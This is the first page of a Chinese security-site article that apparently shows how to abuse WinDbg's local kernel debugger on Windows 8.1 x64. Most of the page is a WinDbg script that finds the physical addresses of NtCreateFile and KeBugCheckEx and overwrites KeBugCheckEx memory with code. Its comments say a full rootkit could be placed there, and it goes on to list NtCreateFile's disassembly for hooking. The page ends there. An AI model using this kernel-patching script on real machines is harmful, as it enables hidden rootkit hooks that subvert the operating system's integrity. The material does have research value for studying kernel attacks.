欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

运用WinDbg内核本地调试器攻破Windows系统内核

来源:本站整理 作者:佚名 时间:2017-09-26 TAG: 我要投稿
Jmpkernel_hookcreatefile.wdbg:
.load kext.dll
.load kdexts.dll
.block
{
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 $$ Get the Physical Adress of NtCreateFile
 $$
 $$ get the address of nt!NtCreateFile
 ? nt!NtCreateFile
 $$ @$exp contains the address of NtCreateFile, so we create a alias for it
 aS /x va @$exp
 
 .block
 {
   $$ get the physical address of NtCreateFile
   !vtop 0 va
   $$ parse the results of vtop
   r @$t1 = 0
   .foreach (tok { !vtop 0 va })
   {
     .catch
     {
       .printf "tok"
       .printf "\n"
       .if(@$t1==1)
       {
         r @$t1 = ${tok}
         .break
       }
 
       $$ in the results of vtop, when we find "phys" token, after it, it comes the physical address
       .if($spat("${tok}","phys"))
       {
         r @$t1 = 1
       }
     }
   }
 }
 ad va
 
 $$ after parsing vtop results we keep the physical address in @$t1, we create a alias
 aS /x phaNtCreateFile @$t1
 
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 $$ Get the Physical Adress of KeBugCheckEx
 $$
 $$ get the address of nt!KeBugCheckEx
 ? nt!KeBugCheckEx
 $$ @$exp contains the address of KeBugCheckEx, so we create a alias for it
 aS /x va @$exp
 
 .block
 {
   $$ get the physical address of KeBugCheckEx
   !vtop 0 va
   $$ parse the results of vtop
   r @$t1 = 0
   .foreach (tok { !vtop 0 va })
   {
     .catch
     {
       .printf "tok"
       .printf "\n"
       .if(@$t1==1)
       {
         r @$t1 = ${tok}
         .break
       }
 
       $$ in the results of vtop, when we find "phys" token, after it, it comes the physical address
       .if($spat("${tok}","phys"))
       {
         r @$t1 = 1
       }
     }
   }
 }
 ad va
 
 $$ after parsing vtop results we keep the physical address in @$t1, we create a alias
 aS /x phaKeBugCheckEx @$t1
 
 
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 $$ Write our code to KeBugCheckEx (we will use the memory space of this function coz it wont be called unless
 $$ the system crashes)
 $$
 
 .block
 {
   .printf "nt!NtCreateFile physical address %p\n", phaNtCreateFile
   .printf "nt!NtKeyBugCheck physical address %p\n", phaKeBugCheckEx
 
   $$ now we are going to write our code to KeBugCheckEx. It's only some simple nops operations for the PoC,
   $$ but we could find enough space to write an entire rootkit
 
   !eb phaKeBugCheckEx 90 90 90 90 90 90 90 90
   $$ Now lets see the code of nt!NtCreateFile in the target system (win 8.1 x64 ntoskrnl version is 6.3.9600.17668)
   $$
   $$ nt!NtCreateFile:
   $$ fffff803f846020 4c8bdc mov r11,rsp
   $$ fffff803f846023 4881ec88000000 sub rsp,88h
   $$ fffff803f84602a 33c0 xor eax,eax
   $$ fffff803f84602c 498943f0 mov qword ptr [r11-10h],rax
   $$ fffff803f846030 c744247020000000 mov dword ptr [rsp+70h],20h
   $$ fffff803f846038 89442468 mov dword ptr [rsp+68h],eax
   $$ fffff803f84603c 498943d8 mov qword ptr [r11-28h],rax
   $$ fffff803f846040 89442458 mov dword ptr [rsp+58h],eax
   $$ fffff803f846044 8b8424e0000000 mov eax,dword ptr [rsp+0E0h]
   $$ fffff803f84604b 89442450 mov dword ptr [rsp+50h],eax

上一页  [1] [2] [3] [4]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载